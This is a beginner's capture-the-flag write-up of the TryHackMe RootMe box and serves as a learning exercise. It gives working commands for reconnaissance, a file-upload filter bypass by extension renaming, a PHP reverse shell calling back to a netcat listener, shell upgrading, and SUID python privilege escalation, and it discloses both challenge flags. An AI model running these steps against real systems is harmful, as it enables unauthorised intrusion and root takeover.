TryHackMe — RootMe

RootMe is a CTF for beginners. It was the first TryHackMe box I completed entirely by myself. It’s pretty easy to hack, but it did introduce a few wrinkles I hadn’t encountered before. For example, I had to research how to bypass file upload restrictions. I ended up using an alternative extension to upload a PHP file. That allowed me to establish a reverse shell. Ultimately, I was able to gain root and hack the box. Here’s a brief overview of some of the techniques used:

• Port scanning
• URI enumeration
• PHP reverse shell
• Privilege escalation

Sound good? Let’s start hacking!

Now were playing with power!

Once I had deployed the box, the first step was reconnaissance. I needed to gain as much info as possible on open ports and running services. I had no particular reason to be stealthy so I ran an aggressive scan. I used nmap -A 10.10.193.164 and determined that OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 was running on port 22 and Apache httpd 2.4.29 was running on port 80. The operating system was Ubuntu Linux.

Always so aggressive

I decided to pull up 10.10.193.164 in my browser, thinking maybe I could find a clue in the source code. Instead of a clue, however, the page offered me challenge. Can I root it?

You bet I can!

After confirming there was nothing hidden in the source code, I decided to look for secret directories. That meant using gobuster -w /usr/share/dirb/wordlists/big.txt dir -u 10.10.193.164 which found several hidden pages. The /panel and /uploads pages both merited further investigation.

Gotta love Gobuster

The /panel page appeared to be used to upload files. I uploaded a test file and then navigated to /uploads. I couldn’t believe my eyes. Turns out anyone can upload files and then view them in the uploads folder. This was a huge vulnerability, and I was going to make them pay. If I could upload and execute a payload I would be able to establish a reverse shell.

Pretty straight-forward

The ideal choice for this exploit would be a PHP script. That would allow me to create a web shell and use the web server as a gateway into the machine. I used wget https://github.com/pentestmonkey/php-reverse-shell/raw/master/php-reverse-shell.php to download a good PHP reverse shell script to my Kali box. Now I just needed to customize the payload.

Downloading the PHP reverse shell script

In order to do that, I used nano php-reverse-shell.php and edited the script. It’s a simple PHP reverse shell, so all I needed to change was the IP address to my Kali box and then set the listening port. I set $ip to my virtual IP from TryHackMe and $port to 4444 and saved the changes.

Updating the script

Once back at the command line, I used chmod +x php-reverse-shell.php to make the file executable before trying to upload it.

Time to execute!

Back in the browser I attempted to upload the file on the 10.10.193.164/panel page but received an error message. It was in Portuguese, but it wasn’t hard to figure out PHP files were not permitted. They were using some sort of file name validation.

PHP não é permitido!

This was the first time I had run into that particular problem, so I googled how to bypass file name validation. It turned out all I needed to bypass this particular filter was to rename the file from PHP to the lesser used PHP5. I did this with the command mv php-reverse-shell.php php-reverse-shell.php5.

With the extension changed to a less common alternative, I was able to successfully upload the PHP reverse shell payload to the /uploads folder.

Sucesso!

I navigated to the /uploads folder and saw my PHP reverse shell. Once I clicked the link, the file would execute on the server and call back to my Kali box. Once I had that, I’d be home free.

My reverse shell awaits!

I set up a Netcat listener on my Kali box with the command nc -lvnp 4444 and clicked the php-reverse-shell.php5 file in the /uploads folder to execute it. Success! I had a shell, but it was a dumb shell. That can be fixed.

Nothing worse than a dumb shell

To fix that I used an exploit that allows us to spawn a full shell. I used python -c ‘import pty;pty.spawn(“/bin/bash”)’ to pull up a pseudo-shell with python. Then I hit Ctrl-Z to move the listener to the background and pull my Kali box back up. Then I typed stty raw -echo followed by fg which brought the listener back into the foreground. Then I typed export TERM=xterm which spawned a full bash shell. This allowed me to use tab completion and other options I wasn’t able to before.

Gotta have tab completion!

I searched for the user.txt file with the command find / -type f -name user.txt and was able to locate the file in /var/www. The first flag was THM{y0u_g0t_a_sh3ll}.

Found it!

Once I had located the user.txt file, I looked to see what commands were running as root by typing find / -type f -user root -perm -4000 2>/dev/null and was quickly able to identify /usr/bin/python as a service I could exploit.

Running python as root 🐍

Knowing that python was running as root, I was able to use python -c ‘import os;os.execl(“/bin/sh”,”sh”,”-p”)’ to escalate to root. Once I did that, I navigated to /root and found the last flag: THM{pr1v1l3g3_3sc4l4t10n}.

It’s been a privilege…

I definitely enjoyed rooting this box. It’s simple but satisfying, and I learned about bypassing file name validation in the process. I would definitely recommend it to anyone looking to practice and hone their skills.

Here’s a listing of some of the tools and commands I used in this hack:

• nmap
• gobuster
• PHP reverse shell
• nano
• alternative extensions
• netcat
• python